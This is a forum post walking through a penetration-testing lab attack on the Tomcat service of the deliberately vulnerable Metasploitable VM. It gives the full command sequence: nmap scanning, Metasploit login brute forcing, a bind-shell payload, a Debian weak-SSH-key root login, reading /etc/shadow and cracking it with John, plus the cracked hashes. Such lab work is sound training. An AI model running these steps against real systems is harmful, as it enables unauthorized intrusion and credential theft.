Results 1 to 1 of 1

Thread: [Video] Metasploitable - TomCat

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Metasploitable - TomCat

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/3826187
    Download video: http://www.mediafire.com/?wv748u6o2jabdsw
    Download usernames.lst: http://www.mediafire.com/?j02jnj3gnx5
    Download passwords.lst: http://www.mediafire.com/?z5imdtojgnw
    Download (debian_ssh_rsa_2048_x86.tar.bz2): debian_ssh_rsa_2048_x86.tar.bz2


    What is this?
    This video demonstrates an attack on the TomCat service on the metasploitable hackable box.

    "Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql." - blog.metasploit.com

    "Apache Tomcat is an open source software implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process." - tomcat.apache.org


    Guide
    > Use Nmap to scan the network (gathering information)
    > Use Nmap to do a more detailed scan of the target (gathering information)
    > Use Metasploit to brute force the login (gaining access)
    > Use Metasploit to send a payload (remote access)
    > *I cheated a little bit here as I had used nessus in a previous scan to discover "Debian OpenSSH/OpenSSL Package Random Number Generator Weakness"*
    > Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
    > Connect via SSH as root (complete access)
    > Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)


    What do I need?

    > Nmap --- on Backtrack 4 (Final)
    > Metasploit --- on Backtrack 4 (Final)
    > SSH--- on Backtrack 4 (Final) > John The Ripper --- on BackTrack!
    > Dictionaries/Word-lists --- Usernames Passwords
    > Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) ---http://www.mediafire.com/?i2mnwymzt51
    > Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)
    > Metasploitable.part01.rar ~Metasploitable.part01.rar (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
    > Metasploitable.part02.rar ~ Metasploitable.part02.rar (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
    > Metasploitable.part03.rar ~ Metasploitable.part03.rar (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
    > Metasploitable.part04.rar ~ Metasploitable.part04.rar (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)
    Commands:
    Code:
    nmap 192.168.1.1-255
    nmap -sV -sS -O -f -n 192.168.1.105
    firefox 192.168.1.105
    msfconsole
    search tomcat
    use scanner/http/tomcat_mgr_login
    show options
    setg RHOSTS 192.168.1.105
    setg RPORT 8180
    set USER_FILE /root/usernames.lst
    set PASS_FILE /root/passwords.lst
    exploit
    use multi/http/tomcat_mgr_deploy
    show options
    setg USERNAME tomcat
    setg PASSWORD tomcat
    show payloads
    set payload generic/shell_bind_tcp
    show options
    exploit
    ls
    whoami
    hostname
    ls -lart /root
    ls -lart /root/.ssh
    cat /root/.ssh/authorized_keys
    firefox -> www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
    tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
    cd rsa/2048
    grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
    ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
    whoami
    hostname
    ifconfig
    cat /etc/shadow
    kate -> Paste -> Save (Filename: /root/shadow)
    john
    ./john --rules --wordlist=/pentest/passwords/wordlists/darkc0de.lst
    ssh msfadmin@192.168.1.105
    
    
    
    ------------------------------------------------------------------------------------root:             = root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
    sys:batman        = sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
    klog:123456789    = klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
    msfadmin:msfadmin = msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
    postgres:postgres = postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
    user:user         = user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
    service:service   = service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
    ------------------------------------------------------------------------------------

    Notes:

    Song: Underworld - Cowgirl
    Video length: 7:07
    Capture length: 11:17

    Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-tomcat.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30078-%5Bvideo%5D-metasploitable-tomcat.html#post167042
    Last edited by g0tmi1k; 03-05-2011 at 02:05 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Metasploitable - MySQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 4
    Last Post: 03-06-2011, 10:57 AM
  2. Owning Metasploitable with Backtrack
    By sickness in forum BackTrack Videos
    Replies: 17
    Last Post: 11-02-2010, 02:12 PM
  3. [Video] Metasploitable - TikiWiki
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:38 PM
  4. [Video] Metasploitable - PostgreSQL
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 07-01-2010, 01:22 PM
  5. Metasploitable
    By thorin in forum Beginners Forum
    Replies: 1
    Last Post: 05-25-2010, 07:07 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •